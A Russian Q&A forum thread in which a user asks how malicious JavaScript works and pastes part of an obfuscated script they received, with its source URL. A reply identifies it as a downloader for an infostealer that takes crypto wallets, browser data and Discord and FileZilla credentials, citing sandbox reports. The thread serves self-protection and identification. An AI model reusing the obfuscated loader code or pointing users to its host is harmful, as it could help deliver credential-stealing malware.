@ivanoffgw

Как определить вредоносный код JavaScript?

Суть вопроса: Как сейчас в 2023 году с помощью javascript работает вредоносный код ? Необходимо для самозащиты и информации. Мне недавно прислали вот такую страницу с таким содержимым js кодом, что это может быть ?

function d(a,x){const E=Z();return d=function(c,D){c=c-(-0x1*0x1213+0xafe+0x1*0x8f5);let Y=E[c];if(d['SwWivq']===undefined){var C=function(q){const w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let U='',Q='',n=U+C;for(let s=-0x2*0x9db+0x8*0x3e3+-0xb62,f,j,l=0x2457+-0x2618+0x1c1*0x1;j=q['charAt'](l++);~j&&(f=s%(-0x111a*0x1+0x417+0xd07)?f*(0x23c6+-0x2704+0x37e)+j:j,s++%(-0x2e*0xbf+-0x2*0x257+0x2704*0x1))?U+=n['charCodeAt'](l+(-0x177b*0x1+-0x51*0x4+0x1b*0xeb))-(-0x1c19*0x1+0x2171*-0x1+0x3d94)!==0xbee+-0xb92*-0x3+0xf*-0x31c?String['fromCharCode'](-0x219*0x6+-0x7b4+0x1549&f>>(-(0x1746+-0x1*0x6e2+-0x1062)*s&0x15*-0x111+-0x5*0x4b2+-0x1f*-0x17b)):s:-0x2*0x5b3+0xbe9*0x2+-0xc6c){j=w['indexOf'](j);}for(let T=-0x1254+-0x68+0x12bc,J=U['length'];T<J;T++){Q+='%'+('00'+U['charCodeAt'](T)['toString'](0x5*-0x679+-0xb7*0x17+0x30de))['slice'](-(0x9e+-0x89*0x1+-0x13));}return decodeURIComponent(Q);};d['vfjfCU']=C,a=arguments,d['SwWivq']=!![];}const G=E[0x163c+-0x1494+-0x1a8],B=c+G,k=a[B];if(!k){const q=function(w){this['mtSDYx']=w,this['jWoNvZ']=[0x2bd+-0x2*0xa80+-0x1*-0x1244,-0xb4*0x22+-0xf0d*-0x2+-0x632,-0x23ea*0x1+0x1*-0x13e9+-0x1cd*-0x1f],this['qZHauy']=function(){return'newState';},this['BNPMDm']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['yyMMgJ']='[\x27|\x22].+[\x27|\x22];?\x20*}';};q['prototype']['KMbSnS']=function(){const w=new RegExp(this['BNPMDm']+this['yyMMgJ']),U=w['test'](this['qZHauy']['toString']())?--this['jWoNvZ'][0x1*0x1222+0x1*0x100a+-0x222b]:--this['jWoNvZ'][-0x3*0xb92+0x1b1*0x1+-0x6b*-0x4f];return this['QqoWZL'](U);},q['prototype']['QqoWZL']=function(w){if(!Boolean(~w))return w;return this['vqQVOM'](this['mtSDYx']);}...


Источник: https://socksx.me/index.js
  • Вопрос задан
  • 547 просмотров
Пригласить эксперта
Ответы на вопрос 1
@humoured
Вы всё на свете найдёте в коробке с карандашами
Как сейчас в 2023 году с помощью javascript работает вредоносный код ?
Как и в любой другой год, вредоносный код работает как угодно, в зависимости от своей вредоносности. Код на JS может как показать всплывающее окно с непристойностями, так и воспользоваться уязвимостью браузера и установить на компьютер какую-нибудь дрянь.

Источник: https://socks...
Пытается загрузить какой-то вирус на компьютер.
63ab833f32932966141093.png

Поведенческая аналитика: https://www.virustotal.com/gui/file/f58b523d7aa8ac...

updated
Более полный отчёт: https://www.hybrid-analysis.com/sample/f58b523d7aa...

что это может быть ?
  • Ворует криптокошельки
  • Ворует данные браузера
  • Ворует данные Дискорда и FileZilla
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
29 нояб. 2024, в 10:38
5000 руб./за проект
29 нояб. 2024, в 10:27
100000 руб./за проект
29 нояб. 2024, в 09:43
100000 руб./за проект